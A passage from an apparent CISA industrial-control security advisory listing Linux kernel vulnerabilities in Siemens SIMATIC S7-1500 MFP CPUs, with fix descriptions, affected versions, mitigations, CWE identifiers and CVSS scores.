<p>In the Linux kernel, the following vulnerability has been resolved: bpf: Fix regsafe() for pointers to packet In case rold-&gt;reg-&gt;range == BEYOND_PKT_END &amp;&amp; rcur-&gt;reg-&gt;range == N regsafe() may return true which may lead to current state with valid packet range not being explored. Fix the bug.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43030">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/372.html">CWE-372 Incomplete Internal State Distinction</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43033</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption When decrypting data that is not in-place (src != dst), there is no need to save the high-order sequence bits in dst as it could simply be re-copied from the source. However, the data to be hashed need to be rearranged accordingly. Thanks,</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43033">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/237.html">CWE-237 Improper Handling of Structural Elements</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43035</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sched: cls_api: fix tc_chain_fill_node to initialize tcm_info to zero to prevent an info-leak When building netlink messages, tc_chain_fill_node() never initializes the tcm_info field of struct tcmsg. Since the allocation is not zeroed, kernel heap memory is leaked to userspace through this 4-byte field. The fix simply zeroes tcm_info alongside the other fields that are already initialized.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43035">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/908.html">CWE-908 Use of Uninitialized Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43038</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: icmp: clear skb2-&gt;cb[] in ip6_err_gen_icmpv6_unreach() Sashiko AI-review observed: In ip6_err_gen_icmpv6_unreach(), the skb is an outer IPv4 ICMP error packet where its cb contains an IPv4 inet_skb_parm. When skb is cloned into skb2 and passed to icmp6_send(), it uses IP6CB(skb2). IP6CB interprets the IPv4 inet_skb_parm as an inet6_skb_parm. The cipso offset in inet_skb_parm.opt directly overlaps with dsthao in inet6_skb_parm at offset 18. If an attacker sends a forged ICMPv4 error with a CIPSO IP option, dsthao would be a non-zero offset. Inside icmp6_send(), mip6_addr_swap() is called and uses ipv6_find_tlv(skb, opt-&gt;dsthao, IPV6_TLV_HAO). This would scan the inner, attacker-controlled IPv6 packet starting at that offset, potentially returning a fake TLV without checking if the remaining packet length can hold the full 18-byte struct ipv6_destopt_hao. Could mip6_addr_swap() then perform a 16-byte swap that extends past the end of the packet data into skb_shared_info? Should the cb array also be cleared in ip6_err_gen_icmpv6_unreach() and ip6ip6_err() to prevent this? This patch implements the first suggestion. I am not sure if ip6ip6_err() needs to be changed. A separate patch would be better anyway.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43038">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/843.html">CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43040</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: ipv6: ndisc: fix ndisc_ra_useropt to initialize nduseropt_padX fields to zero to prevent an info-leak When processing Router Advertisements with user options the kernel builds an RTM_NEWNDUSEROPT netlink message. The nduseroptmsg struct has three padding fields that are never zeroed and can leak kernel data The fix is simple, just zeroes the padding fields.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43040">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/909.html">CWE-909 Missing Initialization of Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43057</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: correctly handle tunneled traffic on IPV6_CSUM GSO fallback NETIF_F_IPV6_CSUM only advertises support for checksum offload of packets without IPv6 extension headers. Packets with extension headers must fall back onto software checksumming. Since TSO depends on checksum offload, those must revert to GSO. The below commit introduces that fallback. It always checks network header length. For tunneled packets, the inner header length must be checked instead. Extend the check accordingly. A special case is tunneled packets without inner IP protocol. Such as RFC 6951 SCTP in UDP. Those are not standard IPv6 followed by transport header either, so also must revert to the software GSO path.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43057">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/358.html">CWE-358 Improperly Implemented Security Check for Standard</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-43284</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: xfrm: esp: avoid in-place decrypt on shared skb frags MSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCP marks such skbs with SKBFL_SHARED_FRAG after skb_splice_from_iter(), so later paths that may modify packet data can first make a private copy. The IPv4/IPv6 datagram append paths did not set this flag when splicing pages into UDP skbs. That leaves an ESP-in-UDP packet made from shared pipe pages looking like an ordinary uncloned nonlinear skb. ESP input then takes the no-COW fast path for uncloned skbs without a frag_list and decrypts in place over data that is not owned privately by the skb. Mark IPv4/IPv6 datagram splice frags with SKBFL_SHARED_FRAG, matching TCP. Also make ESP input fall back to skb_cow_data() when the flag is present, so ESP does not decrypt externally backed frags in place. Private nonlinear skb frags still use the existing fast path. This intentionally does not change ESP output. In esp_output_head(), the path that appends the ESP trailer to existing skb tailroom without calling skb_cow_data() is not reachable for nonlinear skbs: skb_tailroom() returns zero when skb-&gt;data_len is nonzero, while ESP tailen is positive. Thus ESP output will either use the separate destination-frag path or fall back to skb_cow_data().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-43284">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/123.html">CWE-123 Write-what-where Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-46174</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Prevent improper isolation of shared resources in Zen2's op cache Make sure resources are not improperly shared in the op cache and cause instruction corruption this way.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-46174">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-46300</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: skbuff: preserve shared-frag marker during coalescing skb_try_coalesce() can attach paged frags from @from to @to. If @from has SKBFL_SHARED_FRAG set, the resulting @to skb can contain the same externally-owned or page-cache-backed frags, but the shared-frag marker is currently lost. That breaks the invariant relied on by later in-place writers. In particular, ESP input checks skb_has_shared_frag() before deciding whether an uncloned nonlinear skb can skip skb_cow_data(). If TCP receive coalescing has moved shared frags into an unmarked skb, ESP can see skb_has_shared_frag() as false and decrypt in place over page-cache backed frags. Propagate SKBFL_SHARED_FRAG when skb_try_coalesce() transfers paged frags. The tailroom copy path does not need the marker because it copies bytes into @to's linear data rather than transferring frag descriptors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-46300">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/123.html">CWE-123 Write-what-where Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-46333</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ptrace: slightly saner 'get_dumpable()' logic The 'dumpability' of a task is fundamentally about the memory image of the task - the concept comes from whether it can core dump or not - and makes no sense when you don't have an associated mm. And almost all users do in fact use it only for the case where the task has a mm pointer. But we have one odd special case: ptrace_may_access() uses 'dumpable' to check various other things entirely independently of the MM (typically explicitly using flags like PTRACE_MODE_READ_FSCREDS). Including for threads that no longer have a VM (and maybe never did, like most kernel threads). It's not what this flag was designed for, but it is what it is. The ptrace code does check that the uid/gid matches, so you do have to be uid-0 to see kernel thread details, but this means that the traditional "drop capabilities" model doesn't make any difference for this all. Make it all make a *bit* more sense by saying that if you don't have a MM pointer, we'll use a cached "last dumpability" flag if the thread ever had a MM (it will be zero for kernel threads since it is never set), and require a proper CAP_SYS_PTRACE capability to override.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-46333">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/269.html">CWE-269 Improper Privilege Management</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Siemens ProductCERT reported these vulnerabilities to CISA.</li>
</ul>
<hr>
<h2>General Recommendations</h2>
<p>As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity</p>
<hr>
<h2>Additional Resources</h2>
<p>For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories</p>
<hr>
